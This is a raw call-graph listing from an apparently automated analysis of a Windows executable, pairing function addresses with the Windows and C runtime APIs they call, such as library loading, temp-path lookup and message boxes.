7ff6a29b3984 16441->16442 16443 7ff6a29b3962 16441->16443 16444 7ff6a29b1c80 49 API calls 16442->16444 16801 7ff6a29c00bc 16443->16801 16448 7ff6a29b39a3 16444->16448 16449 7ff6a29b8a20 14 API calls 16447->16449 16456 7ff6a29b38de __vcrt_freefls 16447->16456 16448->16448 16453 7ff6a29b1950 115 API calls 16448->16453 16449->16456 16450 7ff6a29b8b30 40 API calls 16451 7ff6a29b3a0b 16450->16451 16452 7ff6a29b8b90 40 API calls 16451->16452 16454 7ff6a29b3a17 16452->16454 16455 7ff6a29b39ce 16453->16455 16457 7ff6a29b8b90 40 API calls 16454->16457 16455->16434 16458 7ff6a29b39de 16455->16458 16456->16450 16462 7ff6a29b390e __vcrt_freefls 16456->16462 16459 7ff6a29b3a23 16457->16459 16460 7ff6a29b2710 54 API calls 16458->16460 16461 7ff6a29b8b90 40 API calls 16459->16461 16468 7ff6a29b3808 __vcrt_freefls 16460->16468 16461->16462 16463 7ff6a29b8a20 14 API calls 16462->16463 16464 7ff6a29b3a3b 16463->16464 16465 7ff6a29b3b2f 16464->16465 16466 7ff6a29b3a60 __vcrt_freefls 16464->16466 16467 7ff6a29b2710 54 API calls 16465->16467 16478 7ff6a29b3aab 16466->16478 16691 7ff6a29b8b30 16466->16691 16467->16468 16468->16427 16470 7ff6a29b8a20 14 API calls 16471 7ff6a29b3bf4 __vcrt_freefls 16470->16471 16472 7ff6a29b3d41 16471->16472 16473 7ff6a29b3c46 16471->16473 16816 7ff6a29b44d0 16472->16816 16474 7ff6a29b3c50 16473->16474 16475 7ff6a29b3cd4 16473->16475 16698 7ff6a29b90e0 16474->16698 16480 7ff6a29b8a20 14 API calls 16475->16480 16477 7ff6a29b3d4f 16482 7ff6a29b3d71 16477->16482 16483 7ff6a29b3d65 16477->16483 16478->16470 16481 7ff6a29b3ce0 16480->16481 16485 7ff6a29b3c61 16481->16485 16488 7ff6a29b3ced 16481->16488 16487 7ff6a29b1c80 49 API calls 16482->16487 16819 7ff6a29b4620 16483->16819 16490 7ff6a29b2710 54 API calls 16485->16490 16497 7ff6a29b3cc8 __vcrt_freefls 16487->16497 16491 7ff6a29b1c80 49 API calls 16488->16491 16490->16468 16494 7ff6a29b3d0b 16491->16494 16492 7ff6a29b3dc4 16748 7ff6a29b9400 16492->16748 16496 7ff6a29b3d12 16494->16496 16494->16497 16500 7ff6a29b2710 54 API calls 16496->16500 16497->16492 16498 7ff6a29b3da7 SetDllDirectoryW LoadLibraryExW 16497->16498 16498->16492 16499 7ff6a29b3dd7 SetDllDirectoryW 16502 7ff6a29b3e0a 16499->16502 16543 7ff6a29b3e5a 16499->16543 16500->16468 16503 7ff6a29b8a20 14 API calls 16502->16503 16511 7ff6a29b3e16 __vcrt_freefls 16503->16511 16504 7ff6a29b3ffc 16506 7ff6a29b4029 16504->16506 16507 7ff6a29b4006 PostMessageW GetMessageW 16504->16507 16505 7ff6a29b3f1b 16753 7ff6a29b33c0 16505->16753 16896 7ff6a29b3360 16506->16896 16507->16506 16514 7ff6a29b3ef2 16511->16514 16518 7ff6a29b3e4e 16511->16518 16517 7ff6a29b8b30 40 API calls 16514->16517 16517->16543 16518->16543 16822 7ff6a29b6db0 16518->16822 16543->16504 16543->16505 16555 7ff6a29c9bb3 16554->16555 16556 7ff6a29c9bd4 16554->16556 16555->16400 16557 7ff6a29ca448 45 API calls 16556->16557 16558 7ff6a29c9bd9 16557->16558 16560 7ff6a29bd339 16559->16560 16560->16408 16563 7ff6a29bd011 16561->16563 16562 7ff6a29bcdd0 16562->16398 16563->16562 16564 7ff6a29bd8f8 7 API calls 16563->16564 16564->16562 16566 7ff6a29bd1c2 _isindst __scrt_get_show_window_mode 16565->16566 16567 7ff6a29bd1e1 RtlCaptureContext RtlLookupFunctionEntry 16566->16567 16568 7ff6a29bd246 __scrt_get_show_window_mode 16567->16568 16569 7ff6a29bd20a RtlVirtualUnwind 16567->16569 16570 7ff6a29bd278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16568->16570 16569->16568 16571 7ff6a29bd2c6 _isindst 16570->16571 16571->16396 16573 7ff6a29bd900 16572->16573 16574 7ff6a29bd90a 16572->16574 16578 7ff6a29bdc94 16573->16578 16574->16414 16579 7ff6a29bd905 16578->16579 16580 7ff6a29bdca3 16578->16580 16582 7ff6a29bdd00 16579->16582 16586 7ff6a29bded0 16580->16586 16583 7ff6a29bdd2b 16582->16583 16584 7ff6a29bdd2f 16583->16584 16585 7ff6a29bdd0e DeleteCriticalSection 16583->16585 16584->16574 16585->16583 16590 7ff6a29bdd38 16586->16590 16596 7ff6a29bde22 TlsFree 16590->16596 16597 7ff6a29bdd7c __vcrt_FlsAlloc 16590->16597 16591 7ff6a29bddaa LoadLibraryExW 16593 7ff6a29bde49 16591->16593 16594 7ff6a29bddcb GetLastError 16591->16594 16592 7ff6a29bde69 GetProcAddress 16592->16596 16593->16592 16595 7ff6a29bde60 FreeLibrary 16593->16595 16594->16597 16595->16592 16597->16591 16597->16592 16597->16596 16598 7ff6a29bdded LoadLibraryExW 16597->16598 16598->16593 16598->16597 16602 7ff6a29cf4f0 16599->16602 16600 7ff6a29cf543 16601 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 16600->16601 16604 7ff6a29cf56c 16601->16604 16602->16600 16603 7ff6a29cf596 16602->16603 16909 7ff6a29cf3c8 16603->16909 16604->16423 16917 7ff6a29bc8c0 16606->16917 16609 7ff6a29b3710 16919 7ff6a29b92f0 FindFirstFileExW 16609->16919 16610 7ff6a29b36eb GetLastError 16924 7ff6a29b2c50 16610->16924 16614 7ff6a29b3723 16939 7ff6a29b9370 CreateFileW 16614->16939 16615 7ff6a29b377d 16950 7ff6a29b94b0 16615->16950 16617 7ff6a29bc5c0 _log10_special 8 API calls 16619 7ff6a29b37b5 16617->16619 16619->16468 16628 7ff6a29b1950 16619->16628 16621 7ff6a29b378b 16622 7ff6a29b3706 16621->16622 16625 7ff6a29b2810 49 API calls 16621->16625 16622->16617 16623 7ff6a29b3734 16942 7ff6a29b2810 16623->16942 16624 7ff6a29b374c __vcrt_FlsAlloc 16624->16615 16625->16622 16629 7ff6a29b45b0 108 API calls 16628->16629 16630 7ff6a29b1985 16629->16630 16631 7ff6a29b1c43 16630->16631 16633 7ff6a29b7f80 83 API calls 16630->16633 16632 7ff6a29bc5c0 _log10_special 8 API calls 16631->16632 16634 7ff6a29b1c5e 16632->16634 16635 7ff6a29b19cb 16633->16635 16634->16430 16634->16431 16677 7ff6a29b1a03 16635->16677 17307 7ff6a29c0744 16635->17307 16637 7ff6a29c00bc 74 API calls 16637->16631 16638 7ff6a29b19e5 16639 7ff6a29b1a08 16638->16639 16640 7ff6a29b19e9 16638->16640 17311 7ff6a29c040c 16639->17311 16642 7ff6a29c4f78 _get_daylight 11 API calls 16640->16642 16644 7ff6a29b19ee 16642->16644 17314 7ff6a29b2910 16644->17314 16646 7ff6a29b1a45 16651 7ff6a29b1a5c 16646->16651 16652 7ff6a29b1a7b 16646->16652 16647 7ff6a29b1a26 16648 7ff6a29c4f78 _get_daylight 11 API calls 16647->16648 16649 7ff6a29b1a2b 16648->16649 16650 7ff6a29b2910 54 API calls 16649->16650 16650->16677 16654 7ff6a29c4f78 _get_daylight 11 API calls 16651->16654 16653 7ff6a29b1c80 49 API calls 16652->16653 16655 7ff6a29b1a92 16653->16655 16656 7ff6a29b1a61 16654->16656 16658 7ff6a29b1c80 49 API calls 16655->16658 16657 7ff6a29b2910 54 API calls 16656->16657 16657->16677 16659 7ff6a29b1add 16658->16659 16660 7ff6a29c0744 73 API calls 16659->16660 16661 7ff6a29b1b01 16660->16661 16662 7ff6a29b1b35 16661->16662 16663 7ff6a29b1b16 16661->16663 16664 7ff6a29c040c _fread_nolock 53 API calls 16662->16664 16665 7ff6a29c4f78 _get_daylight 11 API calls 16663->16665 16666 7ff6a29b1b4a 16664->16666 16667 7ff6a29b1b1b 16665->16667 16668 7ff6a29b1b50 16666->16668 16669 7ff6a29b1b6f 16666->16669 16670 7ff6a29b2910 54 API calls 16667->16670 16671 7ff6a29c4f78 _get_daylight 11 API calls 16668->16671 17329 7ff6a29c0180 16669->17329 16670->16677 16673 7ff6a29b1b55 16671->16673 16675 7ff6a29b2910 54 API calls 16673->16675 16675->16677 16676 7ff6a29b2710 54 API calls 16676->16677 16677->16637 16679 7ff6a29b8a2a 16678->16679 16680 7ff6a29b9400 2 API calls 16679->16680 16681 7ff6a29b8a49 GetEnvironmentVariableW 16680->16681 16682 7ff6a29b8ab2 16681->16682 16683 7ff6a29b8a66 ExpandEnvironmentStringsW 16681->16683 16685 7ff6a29bc5c0 _log10_special 8 API calls 16682->16685 16683->16682 16684 7ff6a29b8a88 16683->16684 16686 7ff6a29b94b0 2 API calls 16684->16686 16687 7ff6a29b8ac4 16685->16687 16688 7ff6a29b8a9a 16686->16688 16687->16438 16689 7ff6a29bc5c0 _log10_special 8 API calls 16688->16689 16690 7ff6a29b8aaa 16689->16690 16690->16438 16692 7ff6a29b9400 2 API calls 16691->16692 16693 7ff6a29b8b4c 16692->16693 16694 7ff6a29b9400 2 API calls 16693->16694 16695 7ff6a29b8b5c 16694->16695 17547 7ff6a29c82a8 16695->17547 16697 7ff6a29b8b6a __vcrt_freefls 16697->16478 16699 7ff6a29b90f5 16698->16699 17565 7ff6a29b8760 GetCurrentProcess OpenProcessToken 16699->17565 16702 7ff6a29b8760 7 API calls 16703 7ff6a29b9121 16702->16703 16704 7ff6a29b9154 16703->16704 16705 7ff6a29b913a 16703->16705 16707 7ff6a29b26b0 48 API calls 16704->16707 16706 7ff6a29b26b0 48 API calls 16705->16706 16708 7ff6a29b9152 16706->16708 16709 7ff6a29b9167 LocalFree LocalFree 16707->16709 16708->16709 16710 7ff6a29b9183 16709->16710 16712 7ff6a29b918f 16709->16712 17575 7ff6a29b2b50 16710->17575 16713 7ff6a29bc5c0 _log10_special 8 API calls 16712->16713 16714 7ff6a29b3c55 16713->16714 16714->16485 16715 7ff6a29b8850 16714->16715 16716 7ff6a29b8868 16715->16716 16717 7ff6a29b888c 16716->16717 16718 7ff6a29b88ea GetTempPathW GetCurrentProcessId 16716->16718 16720 7ff6a29b8a20 14 API calls 16717->16720 17584 7ff6a29b25c0 16718->17584 16721 7ff6a29b8898 16720->16721 17591 7ff6a29b81c0 16721->17591 16727 7ff6a29b8918 __vcrt_freefls 16738 7ff6a29b8955 __vcrt_freefls 16727->16738 17588 7ff6a29c8bd8 16727->17588 16733 7ff6a29bc5c0 _log10_special 8 API calls 16739 7ff6a29b9400 2 API calls 16738->16739 16747 7ff6a29b89c4 __vcrt_freefls 16738->16747 16740 7ff6a29b89a1 16739->16740 16747->16733 16749 7ff6a29b9422 MultiByteToWideChar 16748->16749 16752 7ff6a29b9446 16748->16752 16751 7ff6a29b945c __vcrt_freefls 16749->16751 16749->16752 16750 7ff6a29b9463 MultiByteToWideChar 16750->16751 16751->16499 16752->16750 16752->16751 16764 7ff6a29b33ce __scrt_get_show_window_mode 16753->16764 16754 7ff6a29bc5c0 _log10_special 8 API calls 16756 7ff6a29b3664 16754->16756 16755 7ff6a29b35c7 16755->16754 16756->16468 16772 7ff6a29b90c0 LocalFree 16756->16772 16758 7ff6a29b1c80 49 API calls 16758->16764 16759 7ff6a29b35e2 16761 7ff6a29b2710 54 API calls 16759->16761 16761->16755 16764->16755 16764->16758 16764->16759 16765 7ff6a29b35c9 16764->16765 16767 7ff6a29b2a50 54 API calls 16764->16767 16770 7ff6a29b35d0 16764->16770 17762 7ff6a29b4550 16764->17762 17768 7ff6a29b7e10 16764->17768 17780 7ff6a29b1600 16764->17780 17828 7ff6a29b7110 16764->17828 17832 7ff6a29b4180 16764->17832 17876 7ff6a29b4440 16764->17876 16766 7ff6a29b2710 54 API calls 16765->16766 16766->16755 16767->16764 16771 7ff6a29b2710 54 API calls 16770->16771 16771->16755 16774 7ff6a29b1ca5 16773->16774 16775 7ff6a29c49f4 49 API calls 16774->16775 16776 7ff6a29b1cc8 16775->16776 16776->16434 16778 7ff6a29b9400 2 API calls 16777->16778 16779 7ff6a29b8ba4 16778->16779 16780 7ff6a29c82a8 38 API calls 16779->16780 16781 7ff6a29b8bb6 __vcrt_freefls 16780->16781 16781->16447 16783 7ff6a29b45bc 16782->16783 16784 7ff6a29b9400 2 API calls 16783->16784 16785 7ff6a29b45e4 16784->16785 16786 7ff6a29b9400 2 API calls 16785->16786 16787 7ff6a29b45f7 16786->16787 18043 7ff6a29c6004 16787->18043 16790 7ff6a29bc5c0 _log10_special 8 API calls 16791 7ff6a29b392b 16790->16791 16791->16437 16792 7ff6a29b7f80 16791->16792 16793 7ff6a29b7fa4 16792->16793 16794 7ff6a29c0744 73 API calls 16793->16794 16799 7ff6a29b807b __vcrt_freefls 16793->16799 16795 7ff6a29b7fc0 16794->16795 16795->16799 18434 7ff6a29c7938 16795->18434 16797 7ff6a29c0744 73 API calls 16800 7ff6a29b7fd5 16797->16800 16798 7ff6a29c040c _fread_nolock 53 API calls 16798->16800 16799->16441 16800->16797 16800->16798 16800->16799 16802 7ff6a29c00ec 16801->16802 18449 7ff6a29bfe98 16802->18449 16804 7ff6a29c0105 16804->16437 16806 7ff6a29bc8c0 16805->16806 16807 7ff6a29b2734 GetCurrentProcessId 16806->16807 16808 7ff6a29b1c80 49 API calls 16807->16808 16809 7ff6a29b2787 16808->16809 16810 7ff6a29c49f4 49 API calls 16809->16810 16811 7ff6a29b27cf 16810->16811 16812 7ff6a29b2620 12 API calls 16811->16812 16813 7ff6a29b27f1 16812->16813 16814 7ff6a29bc5c0 _log10_special 8 API calls 16813->16814 16815 7ff6a29b2801 16814->16815 16815->16468 16817 7ff6a29b1c80 49 API calls 16816->16817 16818 7ff6a29b44ed 16817->16818 16818->16477 16820 7ff6a29b1c80 49 API calls 16819->16820 16821 7ff6a29b4650 16820->16821 16821->16497 16823 7ff6a29b6dc5 16822->16823 16824 7ff6a29c4f78 _get_daylight 11 API calls 16823->16824 16827 7ff6a29b3e6c 16823->16827 16825 7ff6a29b6dd2 16824->16825 16826 7ff6a29b2910 54 API calls 16825->16826 16826->16827 16828 7ff6a29b7330 16827->16828 18460 7ff6a29b1470 16828->18460 18566 7ff6a29b6350 16896->18566 16916 7ff6a29c54dc EnterCriticalSection 16909->16916 16918 7ff6a29b36bc GetModuleFileNameW 16917->16918 16918->16609 16918->16610 16920 7ff6a29b9342 16919->16920 16921 7ff6a29b932f FindClose 16919->16921 16922 7ff6a29bc5c0 _log10_special 8 API calls 16920->16922 16921->16920 16923 7ff6a29b371a 16922->16923 16923->16614 16923->16615 16925 7ff6a29bc8c0 16924->16925 16926 7ff6a29b2c70 GetCurrentProcessId 16925->16926 16955 7ff6a29b26b0 16926->16955 16928 7ff6a29b2cb9 16959 7ff6a29c4c48 16928->16959 16931 7ff6a29b26b0 48 API calls 16932 7ff6a29b2d34 FormatMessageW 16931->16932 16934 7ff6a29b2d7f MessageBoxW 16932->16934 16935 7ff6a29b2d6d 16932->16935 16937 7ff6a29bc5c0 _log10_special 8 API calls 16934->16937 16936 7ff6a29b26b0 48 API calls 16935->16936 16936->16934 16938 7ff6a29b2daf 16937->16938 16938->16622 16940 7ff6a29b93b0 GetFinalPathNameByHandleW CloseHandle 16939->16940 16941 7ff6a29b3730 16939->16941 16940->16941 16941->16623 16941->16624 16943 7ff6a29b2834 16942->16943 16944 7ff6a29b26b0 48 API calls 16943->16944 16945 7ff6a29b2887 16944->16945 16946 7ff6a29c4c48 48 API calls 16945->16946 16947 7ff6a29b28d0 MessageBoxW 16946->16947 16948 7ff6a29bc5c0 _log10_special 8 API calls 16947->16948 16949 7ff6a29b2900 16948->16949 16949->16622 16951 7ff6a29b94da WideCharToMultiByte 16950->16951 16952 7ff6a29b9505 16950->16952 16951->16952 16954 7ff6a29b951b __vcrt_freefls 16951->16954 16953 7ff6a29b9522 WideCharToMultiByte 16952->16953 16952->16954 16953->16954 16954->16621 16956 7ff6a29b26d5 16955->16956 16957 7ff6a29c4c48 48 API calls 16956->16957 16958 7ff6a29b26f8 16957->16958 16958->16928 16960 7ff6a29c4ca2 16959->16960 16961 7ff6a29c4cc7 16960->16961 16963 7ff6a29c4d03 16960->16963 16962 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 16961->16962 16965 7ff6a29c4cf1 16962->16965 16977 7ff6a29c3000 16963->16977 16966 7ff6a29bc5c0 _log10_special 8 API calls 16965->16966 16969 7ff6a29b2d04 16966->16969 16967 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16967->16965 16968 7ff6a29c4db0 16974 7ff6a29c4de4 16968->16974 16976 7ff6a29c4db9 16968->16976 16969->16931 16971 7ff6a29c4e0a 16972 7ff6a29c4e14 16971->16972 16971->16974 16975 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16972->16975 16973 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16973->16965 16974->16967 16975->16965 16976->16973 16978 7ff6a29c303e 16977->16978 16979 7ff6a29c302e 16977->16979 16980 7ff6a29c3075 16978->16980 16981 7ff6a29c3047 16978->16981 16982 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 16979->16982 16980->16979 16984 7ff6a29c306d 16980->16984 16988 7ff6a29c3a14 16980->16988 17021 7ff6a29c3460 16980->17021 17058 7ff6a29c2bf0 16980->17058 16983 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 16981->16983 16982->16984 16983->16984 16984->16968 16984->16971 16984->16974 16984->16976 16989 7ff6a29c3ac7 16988->16989 16990 7ff6a29c3a56 16988->16990 16991 7ff6a29c3b20 16989->16991 16992 7ff6a29c3acc 16989->16992 16993 7ff6a29c3af1 16990->16993 16994 7ff6a29c3a5c 16990->16994 17000 7ff6a29c3b37 16991->17000 17001 7ff6a29c3b2a 16991->17001 17006 7ff6a29c3b2f 16991->17006 16995 7ff6a29c3b01 16992->16995 16996 7ff6a29c3ace 16992->16996 17081 7ff6a29c1dc4 16993->17081 16997 7ff6a29c3a61 16994->16997 16998 7ff6a29c3a90 16994->16998 17088 7ff6a29c19b4 16995->17088 16999 7ff6a29c3a70 16996->16999 17008 7ff6a29c3add 16996->17008 16997->17000 17003 7ff6a29c3a67 16997->17003 16998->17003 16998->17006 17019 7ff6a29c3b60 16999->17019 17061 7ff6a29c41c8 16999->17061 17095 7ff6a29c471c 17000->17095 17001->16993 17001->17006 17003->16999 17009 7ff6a29c3aa2 17003->17009 17016 7ff6a29c3a8b 17003->17016 17006->17019 17099 7ff6a29c21d4 17006->17099 17008->16993 17011 7ff6a29c3ae2 17008->17011 17009->17019 17071 7ff6a29c4504 17009->17071 17011->17019 17077 7ff6a29c45c8 17011->17077 17013 7ff6a29bc5c0 _log10_special 8 API calls 17015 7ff6a29c3e5a 17013->17015 17015->16980 17016->17019 17020 7ff6a29c3d4c 17016->17020 17106 7ff6a29c4830 17016->17106 17019->17013 17020->17019 17112 7ff6a29cea78 17020->17112 17022 7ff6a29c346e 17021->17022 17023 7ff6a29c3484 17021->17023 17024 7ff6a29c34c4 17022->17024 17025 7ff6a29c3ac7 17022->17025 17026 7ff6a29c3a56 17022->17026 17023->17024 17027 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17023->17027 17024->16980 17028 7ff6a29c3b20 17025->17028 17029 7ff6a29c3acc 17025->17029 17030 7ff6a29c3af1 17026->17030 17031 7ff6a29c3a5c 17026->17031 17027->17024 17037 7ff6a29c3b37 17028->17037 17038 7ff6a29c3b2a 17028->17038 17043 7ff6a29c3b2f 17028->17043 17032 7ff6a29c3b01 17029->17032 17033 7ff6a29c3ace 17029->17033 17039 7ff6a29c1dc4 38 API calls 17030->17039 17034 7ff6a29c3a61 17031->17034 17035 7ff6a29c3a90 17031->17035 17041 7ff6a29c19b4 38 API calls 17032->17041 17036 7ff6a29c3a70 17033->17036 17045 7ff6a29c3add 17033->17045 17034->17037 17040 7ff6a29c3a67 17034->17040 17035->17040 17035->17043 17042 7ff6a29c41c8 47 API calls 17036->17042 17056 7ff6a29c3b60 17036->17056 17044 7ff6a29c471c 45 API calls 17037->17044 17038->17030 17038->17043 17053 7ff6a29c3a8b 17039->17053 17040->17036 17046 7ff6a29c3aa2 17040->17046 17040->17053 17041->17053 17042->17053 17047 7ff6a29c21d4 38 API calls 17043->17047 17043->17056 17044->17053 17045->17030 17048 7ff6a29c3ae2 17045->17048 17049 7ff6a29c4504 46 API calls 17046->17049 17046->17056 17047->17053 17051 7ff6a29c45c8 37 API calls 17048->17051 17048->17056 17049->17053 17050 7ff6a29bc5c0 _log10_special 8 API calls 17052 7ff6a29c3e5a 17050->17052 17051->17053 17052->16980 17054 7ff6a29c4830 45 API calls 17053->17054 17053->17056 17057 7ff6a29c3d4c 17053->17057 17054->17057 17055 7ff6a29cea78 46 API calls 17055->17057 17056->17050 17057->17055 17057->17056 17290 7ff6a29c1038 17058->17290 17062 7ff6a29c41ee 17061->17062 17124 7ff6a29c0bf0 17062->17124 17067 7ff6a29c4830 45 API calls 17068 7ff6a29c4333 17067->17068 17069 7ff6a29c4830 45 API calls 17068->17069 17070 7ff6a29c43c1 17068->17070 17069->17070 17070->17016 17072 7ff6a29c4539 17071->17072 17073 7ff6a29c4557 17072->17073 17074 7ff6a29c4830 45 API calls 17072->17074 17076 7ff6a29c457e 17072->17076 17075 7ff6a29cea78 46 API calls 17073->17075 17074->17073 17075->17076 17076->17016 17080 7ff6a29c45e9 17077->17080 17078 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17079 7ff6a29c461a 17078->17079 17079->17016 17080->17078 17080->17079 17083 7ff6a29c1df7 17081->17083 17082 7ff6a29c1e26 17087 7ff6a29c1e63 17082->17087 17260 7ff6a29c0c98 17082->17260 17083->17082 17085 7ff6a29c1ee3 17083->17085 17086 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17085->17086 17086->17087 17087->17016 17089 7ff6a29c19e7 17088->17089 17090 7ff6a29c1a16 17089->17090 17092 7ff6a29c1ad3 17089->17092 17091 7ff6a29c0c98 12 API calls 17090->17091 17094 7ff6a29c1a53 17090->17094 17091->17094 17093 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17092->17093 17093->17094 17094->17016 17096 7ff6a29c475f 17095->17096 17098 7ff6a29c4763 __crtLCMapStringW 17096->17098 17268 7ff6a29c47b8 17096->17268 17098->17016 17100 7ff6a29c2207 17099->17100 17101 7ff6a29c2236 17100->17101 17103 7ff6a29c22f3 17100->17103 17102 7ff6a29c0c98 12 API calls 17101->17102 17105 7ff6a29c2273 17101->17105 17102->17105 17104 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17103->17104 17104->17105 17105->17016 17107 7ff6a29c4847 17106->17107 17272 7ff6a29cda28 17107->17272 17113 7ff6a29ceaa9 17112->17113 17121 7ff6a29ceab7 17112->17121 17114 7ff6a29cead7 17113->17114 17115 7ff6a29c4830 45 API calls 17113->17115 17113->17121 17116 7ff6a29ceb0f 17114->17116 17117 7ff6a29ceae8 17114->17117 17115->17114 17119 7ff6a29ceb9a 17116->17119 17120 7ff6a29ceb39 17116->17120 17116->17121 17280 7ff6a29d0110 17117->17280 17122 7ff6a29cf910 _fread_nolock MultiByteToWideChar 17119->17122 17120->17121 17283 7ff6a29cf910 17120->17283 17121->17020 17122->17121 17125 7ff6a29c0c27 17124->17125 17126 7ff6a29c0c16 17124->17126 17125->17126 17127 7ff6a29cd66c _fread_nolock 12 API calls 17125->17127 17132 7ff6a29ce5e0 17126->17132 17128 7ff6a29c0c54 17127->17128 17129 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17128->17129 17131 7ff6a29c0c68 17128->17131 17129->17131 17130 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17130->17126 17131->17130 17133 7ff6a29ce630 17132->17133 17134 7ff6a29ce5fd 17132->17134 17133->17134 17136 7ff6a29ce662 17133->17136 17135 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17134->17135 17144 7ff6a29c4311 17135->17144 17142 7ff6a29ce775 17136->17142 17149 7ff6a29ce6aa 17136->17149 17137 7ff6a29ce867 17187 7ff6a29cdacc 17137->17187 17139 7ff6a29ce82d 17180 7ff6a29cde64 17139->17180 17141 7ff6a29ce7fc 17173 7ff6a29ce144 17141->17173 17142->17137 17142->17139 17142->17141 17143 7ff6a29ce7bf 17142->17143 17146 7ff6a29ce7b5 17142->17146 17163 7ff6a29ce374 17143->17163 17144->17067 17144->17068 17146->17139 17148 7ff6a29ce7ba 17146->17148 17148->17141 17148->17143 17149->17144 17154 7ff6a29ca514 17149->17154 17152 7ff6a29ca970 _isindst 17 API calls 17153 7ff6a29ce8c4 17152->17153 17155 7ff6a29ca521 17154->17155 17156 7ff6a29ca52b 17154->17156 17155->17156 17161 7ff6a29ca546 17155->17161 17157 7ff6a29c4f78 _get_daylight 11 API calls 17156->17157 17158 7ff6a29ca532 17157->17158 17160 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17158->17160 17159 7ff6a29ca53e 17159->17144 17159->17152 17160->17159 17161->17159 17162 7ff6a29c4f78 _get_daylight 11 API calls 17161->17162 17162->17158 17196 7ff6a29d411c 17163->17196 17167 7ff6a29ce41c 17168 7ff6a29ce471 17167->17168 17169 7ff6a29ce43c 17167->17169 17172 7ff6a29ce420 17167->17172 17249 7ff6a29cdf60 17168->17249 17245 7ff6a29ce21c 17169->17245 17172->17144 17174 7ff6a29d411c 38 API calls 17173->17174 17175 7ff6a29ce18e 17174->17175 17176 7ff6a29d3b64 37 API calls 17175->17176 17177 7ff6a29ce1de 17176->17177 17178 7ff6a29ce1e2 17177->17178 17179 7ff6a29ce21c 45 API calls 17177->17179 17178->17144 17179->17178 17181 7ff6a29d411c 38 API calls 17180->17181 17182 7ff6a29cdeaf 17181->17182 17183 7ff6a29d3b64 37 API calls 17182->17183 17184 7ff6a29cdf07 17183->17184 17185 7ff6a29cdf0b 17184->17185 17186 7ff6a29cdf60 45 API calls 17184->17186 17185->17144 17186->17185 17188 7ff6a29cdb44 17187->17188 17189 7ff6a29cdb11 17187->17189 17191 7ff6a29cdb5c 17188->17191 17192 7ff6a29cdbdd 17188->17192 17190 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17189->17190 17195 7ff6a29cdb3d __scrt_get_show_window_mode 17190->17195 17193 7ff6a29cde64 46 API calls 17191->17193 17194 7ff6a29c4830 45 API calls 17192->17194 17192->17195 17193->17195 17194->17195 17195->17144 17197 7ff6a29d416f fegetenv 17196->17197 17198 7ff6a29d7e9c 37 API calls 17197->17198 17202 7ff6a29d41c2 17198->17202 17199 7ff6a29d41ef 17204 7ff6a29ca514 __std_exception_copy 37 API calls 17199->17204 17200 7ff6a29d42b2 17201 7ff6a29d7e9c 37 API calls 17200->17201 17203 7ff6a29d42dc 17201->17203 17202->17200 17205 7ff6a29d428c 17202->17205 17206 7ff6a29d41dd 17202->17206 17207 7ff6a29d7e9c 37 API calls 17203->17207 17208 7ff6a29d426d 17204->17208 17211 7ff6a29ca514 __std_exception_copy 37 API calls 17205->17211 17206->17199 17206->17200 17209 7ff6a29d42ed 17207->17209 17210 7ff6a29d5394 17208->17210 17215 7ff6a29d4275 17208->17215 17212 7ff6a29d8090 20 API calls 17209->17212 17213 7ff6a29ca970 _isindst 17 API calls 17210->17213 17211->17208 17224 7ff6a29d4356 __scrt_get_show_window_mode 17212->17224 17214 7ff6a29d53a9 17213->17214 17216 7ff6a29bc5c0 _log10_special 8 API calls 17215->17216 17217 7ff6a29ce3c1 17216->17217 17241 7ff6a29d3b64 17217->17241 17218 7ff6a29d46ff __scrt_get_show_window_mode 17219 7ff6a29d4cdb memcpy_s __scrt_get_show_window_mode 17220 7ff6a29d4a3f 17219->17220 17223 7ff6a29d49eb 17219->17223 17233 7ff6a29c4f78 11 API calls _get_daylight 17219->17233 17237 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 17219->17237 17221 7ff6a29d3c80 37 API calls 17220->17221 17226 7ff6a29d5157 17221->17226 17222 7ff6a29d4397 memcpy_s 17222->17219 17235 7ff6a29d47f3 memcpy_s __scrt_get_show_window_mode 17222->17235 17223->17220 17223->17223 17225 7ff6a29d53ac memcpy_s 37 API calls 17223->17225 17224->17218 17224->17222 17227 7ff6a29c4f78 _get_daylight 11 API calls 17224->17227 17225->17220 17226->17226 17231 7ff6a29d53ac memcpy_s 37 API calls 17226->17231 17240 7ff6a29d51b2 17226->17240 17228 7ff6a29d47d0 17227->17228 17230 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17228->17230 17229 7ff6a29d5338 17232 7ff6a29d7e9c 37 API calls 17229->17232 17230->17222 17231->17240 17232->17215 17233->17219 17234 7ff6a29c4f78 11 API calls _get_daylight 17234->17235 17235->17223 17235->17234 17238 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 17235->17238 17236 7ff6a29d3c80 37 API calls 17236->17240 17237->17219 17238->17235 17239 7ff6a29d53ac memcpy_s 37 API calls 17239->17240 17240->17229 17240->17236 17240->17239 17242 7ff6a29d3b83 17241->17242 17243 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17242->17243 17244 7ff6a29d3bae memcpy_s 17242->17244 17243->17244 17244->17167 17246 7ff6a29ce248 memcpy_s 17245->17246 17247 7ff6a29c4830 45 API calls 17246->17247 17248 7ff6a29ce302 memcpy_s __scrt_get_show_window_mode 17246->17248 17247->17248 17248->17172 17250 7ff6a29cdf9b 17249->17250 17254 7ff6a29cdfe8 memcpy_s 17249->17254 17251 7ff6a29ca884 _invalid_parameter_noinfo 37 API 